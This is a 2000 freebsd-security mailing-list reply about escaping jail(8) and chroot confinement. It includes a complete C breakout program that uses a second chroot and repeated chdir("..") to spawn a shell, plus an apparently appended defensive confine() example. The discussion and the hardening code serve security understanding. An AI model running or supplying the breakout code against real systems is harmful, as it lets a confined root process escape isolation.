From: Cy Schubert - ITSD Open Systems Group
Reply-To: Cy Schubert - ITSD Open Systems Group
To: Poul-Henning Kamp
Cc: Paul Hart, Adam Laurie, freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
Date: Fri, 12 May 2000 06:19:06 -0700
Message-Id: <200005121319.e4CDJev40777@cwsys.cwsent.com>
In-reply-to: Your message of "Fri, 12 May 2000 10:00:11 +0200." <4226.958118411@critter.freebsd.dk>
X-OS: FreeBSD 4.0-STABLE

In message <4226.958118411@critter.freebsd.dk>, Poul-Henning Kamp writes:
> In message , Paul Hart writes:
> >On Thu, 11 May 2000, Adam Laurie wrote:
> >
> >> If someone backdoors your system with an authorized key, and is
> >> confident they can gain root from a luser account, they don't need to
> >> go any further, and it's extremely likely that the change will go
> >> unnoticed *forever*
> >
> >But if you have hostile local users with root access, can you even trust
> >the output from /etc/security?
>
> Yes, if you put them in a jail(8).

I was about to comment that anyone with root can break out of any
chrooted environment including jail, however testing the break out of
jail exploit (good thing I tested before I spoke), which BTW worked on
FreeBSD-3 and numerous other platforms including Linux, Solaris, and
Tru64-UNIX, appears to no longer work under 4.0 -- which is a good
thing! When did the FreeBSD chroot(2) get fixed?

Once again FreeBSD leads the way.

Following is the break-out-of-jail code.

#include <assert.h>
#include <unistd.h>

const char *shell = "/bin/sh";
const char *lowerdir = "/tmp";

int main()
{
	int i;

	/* chroot without a chdir into lowerdir: the cwd stays at the old "/" */
	assert(chdir("/") != -1);
	assert(chroot(lowerdir) != -1);
	for (i = 0; i < 32; i++)
		assert(chdir("..") != -1);
	/* make the directory reached above the root again */
	assert(chroot(".") != -1);
	assert(execl(shell, shell, (char *)NULL) != -1);
}

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC
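
The listing in the message depends on two things: the first chroot(2) leaves the working directory outside the new root, and the process is still root when it calls chroot(2) again. The following is an added example, not part of the original message, of a confinement routine that removes both conditions; the names confine and cwd_within_root and the uid/gid 65534 are assumptions made for illustration.

```c
/* Added example, not from the post; confine() and cwd_within_root() are
 * hypothetical names and 65534 is a constructed unprivileged uid/gid. */
#define _DEFAULT_SOURCE   /* glibc: declare chroot(2) and setgroups(2) */
#include <sys/types.h>
#include <sys/stat.h>
#include <grp.h>
#include <string.h>
#include <unistd.h>

/* 1: cwd is under the process root; 0: cwd is outside it (what the
 * listing relies on); -1: error or deeper than 64 levels. */
int cwd_within_root(void)
{
    struct stat root, cur, up;
    char path[3 * 64 + 2] = ".";
    if (stat("/", &root) == -1 || stat(path, &cur) == -1)
        return -1;
    for (int depth = 0; depth < 64; depth++) {
        if (cur.st_dev == root.st_dev && cur.st_ino == root.st_ino)
            return 1;            /* walked up to our own root */
        strcat(path, "/..");
        if (stat(path, &up) == -1)
            return -1;
        if (up.st_dev == cur.st_dev && up.st_ino == cur.st_ino)
            return 0;            /* reached the top without meeting "/" */
        cur = up;
    }
    return -1;
}

/* Enter dir before chroot(2) so no cwd is left outside, then drop root.
 * Returns 0, or a negative number naming the step that failed. */
int confine(const char *dir, uid_t uid, gid_t gid)
{
    if (chdir(dir) == -1)            return -1;
    if (chroot(".") == -1)           return -2;
    if (chdir("/") == -1)            return -3;
    if (cwd_within_root() != 1)      return -4;
    if (setgroups(1, &gid) == -1)    return -5;
    if (setgid(gid) == -1)           return -6;
    if (setuid(uid) == -1)           return -7;
    if (uid != 0 && setuid(0) != -1) return -8;  /* root must not return */
    return 0;
}

int main(void)
{
    return confine("/tmp", 65534, 65534) != 0;  /* needs root to succeed */
}
```

A caller that gets a non-zero code should exit rather than continue unconfined.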